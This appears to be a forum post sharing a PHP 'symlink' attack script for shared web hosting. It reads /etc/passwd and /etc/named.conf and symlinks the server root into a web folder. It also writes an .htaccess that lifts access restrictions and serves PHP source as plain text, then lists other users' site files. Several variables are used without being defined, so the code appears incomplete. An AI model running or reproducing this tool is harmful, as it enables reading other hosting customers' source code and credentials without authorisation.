Locked SymLink [Private]

[sQuo]

[LENGUAJE=php]<?phpif(php_sapi_name() != 'cli'){ if (strpos($script, get_current_user()) !== false) { $scriptp = explode("/", $script); $urlp = explode("/", $url); if($script[strlen($script)-1] == "/"){ $script = substr($script, 0, -1); } if($url[strlen($url)-1] == "/"){ $url = substr($url, 0, -1); } $url1 = $url; if($scriptp[count($scriptp)-1] != $urlp[count($urlp)-1]){ $script = substr($script, 0, -1*strlen($scriptp[count($scriptp)-1])); $url1 = str_replace($scriptp[count($scriptp)-1], "", $url1); $scriptp = explode("/", $script); } else { $url1 = str_replace($urlp[count($urlp)-1], "", $url1); } if($url1[strlen($url1)-1] == "/"){ $url1 = substr($url1, 0, -1); } $url1 = "http://".$_SERVER['HTTP_HOST'].$url1."/sym/root/"; $script = str_replace($url, "", $script); $script = str_replace(get_current_user(), "[%user%]", $script); echo "[*] Detected path template: $script

"; if(@file("/etc/named.conf") || @file('/etc/passwd')){ @mkdir('sym', 0777); $htaccessC = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $htaccessFH = @fopen ('sym/.htaccess', 'w'); fwrite($htaccessFH ,$htaccessC); @symlink('/', 'sym/root'); echo "[*] Symlink Vulnerable

"; echo "[*] Symlink opened: $url1

"; if(@file("/etc/named.conf")){ echo "[*] /etc/named.conf Detected

"; $data = @file('/etc/named.conf'); foreach($data as $line){ if(eregi('zone',$line)){ preg_match_all('#zone "(.*)"#',$line,$username); flush(); if(strlen(trim($username[1][0])) >2){ $owner = posix_getpwuid(@fileowner('/etc/valiases/'.$username[1][0])); $owner = $owner['name']; $domain = $username[1][0]; if(file_exists("./sym/root/".str_replace("[%user%]", $owner, $script))){ echo "[*] Found [$domain] : ".str_replace("[%user%]", $owner, $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found [$domain] : ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } else { echo "[*] Not Found [$domain] : ".str_replace("[%user%]", $owner, $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found [$domain] : ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } flush(); } } } } else { echo "[*] /etc/named.conf Not Detected

"; } if(@file("/etc/passwd")){ echo "[*] /etc/passwd Detected

"; $data = file("/etc/passwd"); foreach($data as $line){ if (strpos($line, ":") !== false) { $line = explode(":", $line); if(file_exists("./sym/root/".str_replace("[%user%]", $line[0], $script))){ echo "[*] Found: ".str_replace("[%user%]", $line[0], $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found: ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } else { echo "[*] Not Found: ".str_replace("[%user%]", $line[0], $script)."

"; flush(); foreach($scripts as $scripta){ if(file_exists(str_replace("[%user%]", $line[0], $script).$scripta)){ echo "[*] Found: ".str_replace("[%user%]", $line[0], $script).$scripta."

"; flush(); } } } } } } else { echo "[*] /etc/passwd Not Detected

"; } } else { echo "[*] Symlink Not Vulnerable

"; } } else { echo "[*] Username not detected in path

"; }}else{ echo "[*] This script does not work in console";}?>[/LENGUAJE]